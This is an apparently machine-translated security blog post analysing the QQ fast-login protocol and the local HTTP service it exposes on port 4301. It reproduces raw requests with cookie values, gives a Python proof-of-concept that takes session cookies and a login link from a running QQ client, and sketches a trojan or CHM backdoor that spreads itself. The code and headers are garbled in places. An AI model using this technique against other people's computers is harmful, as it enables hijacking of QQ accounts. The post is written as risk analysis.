Analysis of QQ Fast login protocol and risk reflection

Objective

As we all know, Tencent used to use ActiveX to implement QQ fast login, now fast login has no control. So what are the wonderful ways to do web and local application interaction? In fact, it is true that Web and local applications may interact with HTTP in their interactions.

Quick Login Analysis

1. Quick Login Box Request

Xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=371&ptnoauth=1&s_url=https%3a%2f%2fbuluo.qq.com%2f%23

GET/CGI-BIN/XLOGIN?APPID=715030901&DAID=371&PT_NO_AUTH=1&S_URL=HTTPS%3A%2F%2FBULUO.QQ.COM%2F HTTP/ 1.1host:xui.ptlogin2.qq.comuser-agent:mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) gecko/20100101 firefox/61.0accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q= 0.8accept-language:zh-cn,zh;q=0.8,zh-tw;q=0.7,zh-hk;q=0.5,en-us;q=0.3,en;q=0.2accept-encoding:gzip, deflate, Brreferer:buluo.qq.com/connection:keep-aliveupgrade-insecure-requests:1

　　

Parameter description:

• AppID and Daid correspond to this different landing services, such as QQ space and interest tribe is not the same

• Referer must have a. qq.com Domain name

This request will respond to the cookie, and the key is the ptlocaltoken field

2. Access to QQ users online

Through the above request, you can get the QQ nickname that has been logged in. The specific contents of the request and response are as follows:

Request:

get/pt_get_uins?callback=ptui_getuins_cb&r=0.70722284119771&pt_local_tk=-1335054259 HTTP/1.1Host: localhost.ptlogin2.qq.com:4301user-agent:mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) gecko/20100101 firefox/61.0accept: */*accept-language:zh-cn,zh;q=0.8,zh-tw;q=0.7,zh-hk;q=0.5,en-us;q=0.3 , En;q=0.2accept-encoding:gzip, deflate, brreferer:xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid= 371&pt_no_auth=1&s_url=https%3a%2f%2fbuluo.qq.com%2fcookie:pt_login_sig= sj7r2dqseouqfw5aai9jib644ms5einfscj5brwunqhiodeivxjxz9zfl9m7oixl;pt_serverip=28f40af17263c651; pt_local_token=-1335054259;  pgv_pvi=2505876480; pgv_si=s8995244032; _qpsvr_localtk=0.3150553721024726connection:keep-alive

　　

Response:

var var_sso_uin_list=[{"account": "Xxxxxxxxx", "Client_type": 65793, "Face_index": 339, "Gender": 1, "nickname": " Xxxxxxx "," UIn ":" Xxxxxxxxx "," Uin_flag ": 327156224}];p TUI_GETUINS_CB (var_sso_uin_list);

　　

In the above request, you can discover localhost from there. Ptlogin2. QQ. COM:4301 This domain name and port, if you try to ping this domain name, found that it is actually 127.0.0.1.

And 4301 is the port that QQ listens to.

Use the Netstat-anto command to see the process ID 9284 for listening on port 4301.

Then use the tasklist|findstr "9284" command and discover that it is indeed QQ.exe

3. Click on your avatar

Be sure to note the cookie changes after clicking.

3.1 Cookie Change 1

Request:

get/pt_get_st?clientuin=594675898&callback=ptui_getst_cb&r=0.9726726550496937&pt_local_tk= 1692729835 http/1.1host:localhost.ptlogin2.qq.com:4301user-agent:mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) gecko/20100101 firefox/61.0accept: */*accept-language:zh-cn,zh;q=0.8,zh-tw;q=0.7,zh-hk;q=0.5,en-us;q=0.3 , En;q=0.2accept-encoding:gzip, deflate, brreferer:xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid= 371&pt_no_auth=1&s_url=https%3a%2f%2fbuluo.qq.com%2f%23cookie:pt_login_sig=f0eq6l9zhyn* YYDNJJSUDXGKL1TNFFDT*EK7T4UB5KN9UD*SAQHMENN7TBB2AUKB; pt_clientip=5c490e1116214b49; pt_serverip=aaa20af17263555d; pt_local_token=1692729835; uikey=2ff0398fd9f14f09281e369daf09808512791eccdd166e64088ee1a9bdfff26d; Pt_guid_sig=a015dce2e00991b4181682d886b9b8dae892bd36dcb1afe3fcc2e93945a58cab; pgv_pvi=2505876480; pgv_si=s8995244032; _qpsvr_localtk=0.3150553721024726; qrsig=ufypcl5fkmlpv-lqw1bonsykudz*equmiyxzvpk17ssfisshojzqnrozd3tlvx4h; pt2gguin=o0594675898; etk=;pt_recent_uins= 046df7337fa517d209268b658c29ffa7eed66beaed9b66d86cb700aa5bdaf630fd18757dee2e15d69465910176e5cc0328bdfcc212f7fd96 ; PTISP=CTC; RK=6K58L1C0ZQ; ptnick_594675898=e4b880e7bc95e99d92e4b89d; Ptcz=b13e557d01d48fb5f7b394288c304db80aea0ab3d62b31b492354e58b627211aconnection:keep-alive

　　

3.2 Cookie Change 2

Request:

get/jump?clientuin=xxxxxx&keyindex=9&pt_aid=715030901&daid=371&u1=https%3a%2f%2fbuluo.qq.com% 2F%23&PT_LOCAL_TK=1240200107&PT_3RD_AID=0&PTOPT=1&STYLE=40 Http/1.1host: ssl.ptlogin2.qq.comuser-agent:mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) gecko/20100101 firefox/61.0accept: */*accept-language:zh-cn,zh;q=0.8,zh-tw;q=0.7,zh-hk;q=0.5,en-us;q=0.3 , En;q=0.2accept-encoding:gzip, deflate, brreferer:xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid= 371&pt_no_auth=1&s_url=https%3a%2f%2fbuluo.qq.com%2f%23cookie:pt_login_sig=f0eq6l9zhyn* YYDNJJSUDXGKL1TNFFDT*EK7T4UB5KN9UD*SAQHMENN7TBB2AUKB; pt_clientip=5c490e1116214b49; pt_serverip=aaa20af17263555d; pt_local_token=1692729835; uikey=2ff0398fd9f14f09281e369daf09808512791eccdd166e64088ee1a9bdfff26d; Pt_guid_sig=a015dce2e00991b4181682d886b9b8dae892bd36dcb1afe3fcc2e93945a58cab; pgv_pvi=2505876480; pgv_si=s8995244032; _qpsvr_localtk=0.3150553721024726; Qrsig=ufypcl5fkmlpv-lqw1bonsykudz*equmiyxzvpk17ssfisshojzqnrozd3tlvx4h; clientuin=594675898; pt2gguin=o0594675898; etk=; pt_recent_uins= 046df7337fa517d209268b658c29ffa7eed66beaed9b66d86cb700aa5bdaf630fd18757dee2e15d69465910176e5cc0328bdfcc212f7fd96 ; PTISP=CTC; RK=6K58L1C0ZQ; ptnick_594675898=e4b880e7bc95e99d92e4b89d; ptcz=b13e557d01d48fb5f7b394288c304db80aea0ab3d62b31b492354e58b627211a; Connection:keep-alive

　　

3.3 Landing Jump Link

In the previous step of the request, will return the final landing jump link , the link is copied to the browser to complete the landing .

4 Analogue Login

You can login successfully with the jump link obtained above. Through the analysis of the above process, Python is used below to perform a mock landing. The code is as follows:

Import reimport requestsheaders= {' Referer ': ' buluo.qq.com/', ' user-agent ': ' mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) gecko/20100101 firefox/61.0 "}# #第一步获取pt_local_tokens = requests.session () R = S.get (" xui.ptlogin2.qq.com/c Gi-bin/xlogin?appid=715030901&daid=371&pt_no_auth=1&s_url=https%3a%2f%2fbuluo.qq.com%2f%23 ", headers=headers) Pt_local_token = R.cookies.get (' Pt_local_token ') # #第二步获取在线的QQ用户r = S.get ("localhost.ptlogin2.qq.com : 4301/pt_get_uins?callback=ptui_getuins_cb&r=0.70722284119771&pt_local_tk= "+pt_local_token,headers= Headers) pattern = Re.compile (R ' "UIn": "(\d+)" ') UIn = Pattern.findall (R.text) If Len (UIn) >0: #获取cookie s.get ("Localho St.ptlogin2.qq.com:4301/pt_get_st?clientuin=%s&callback=ptui_getst_cb&r=0.9726726550496937&pt_ local_tk=%s "% (Uin[0],pt_local_token), headers=headers) R = S.get (' ssl.ptlogin2.qq.com/jump?clientuin=%s& Keyindex=9&pt_aid=715030901&daid=371&u1=buluo.qq.com/&pt_local_tk=%s&pT_3rd_aid=0&ptopt=1&style=40 '% (Uin[0],pt_local_token), headers=headers) pattern = Re.compile (R ' http[s]?:/ /(?: [a-za-z]| [0-9]| [$-_@.&+]| [!*\(\),]| (?:%[0-9a-fa-f][0-9a-fa-f])) + ') url = pattern.findall (r.text) print (url[0])

　　

Reflection

QQ's Quick login is done by setting up a server locally and binding 127.0.0.1, and then making the browser accessible to the local server for implementation. If you want to steal a cookie or a login link, you need a hacker to put a trojan on your computer and interact with your QQ. but a fine thought, since the hacker can already be planted in your computer Trojan horse, fully can get your QQ account password . QQ this way of communication really no reflection of the place ?

personal feeling is not so !!! QQ does not verify the source of the request, and any program that can send an HTTP request can interact with it and obtain a cookie. In fact this is greatly reduced the cost of the attack , it is very easy to conduct malicious marketing . Why is it that the cost of the attack is lowered? The general QQ theft, is the upload Trojan, or screenshots to get your account password, or listen to your keyboard input. Such trojan behavior is easier to find by security software first, and then even if you have stolen the password, landing on your computer, it is easy to be found by the QQ Security Center, to send users off-site landing warning , so the use of QQ number profit is not particularly easy .

But through the idea of this article, Trojan Horse in the user's computer run, very easy to obtain cookies, and security software will not be found in your request , when the Trojan to obtain a cookie, you can access your services and assets , such as automatically post in your space , email, view albums and so on, and even if you change the password is useless . There are many ways to make a profit, and the cost is low and easy to spread. Why is it easy to spread ?

We can imagine an attack scenario in which aCHM file is usually a help document or an ebook, but it can be used as a backdoor and is very covert . CHM back door and QQ after the interaction, to obtain a cookie, but also their own download links to space and so on, continue to spread.

In a word, the attack cost is reduced, the profit efficiency is improved, the black production likes the way .

At last

Follow the public number: Seven night security blog

• Reply to "1": Collect Python Data Analysis Tutorial Package
• Reply to "2": Collect Python Flask full set of tutorials
• Reply to "3": Pick up a college machine learning tutorial
• Reply to "4": Pick up Crawler tutorial